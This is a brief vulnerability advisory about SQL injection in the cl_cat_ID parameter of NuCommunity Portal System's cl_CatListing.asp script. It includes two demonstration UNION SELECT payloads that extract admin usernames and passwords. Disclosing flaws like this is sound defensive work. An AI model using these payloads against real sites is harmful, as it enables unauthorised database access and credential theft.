Description:   A vulnerability was reported in NuCommunity Portal System. A remote user can inject SQL commands.

The 'cl_CatListing.asp' script does not properly validate user-supplied input in the 'cl_cat_ID' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

Some demonstration exploit values are provided:

-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20[userID]

-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20[userID]

ajann reported this vulnerability.

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Cause:   Input validation error
Underlying OS:  Windows (Any)
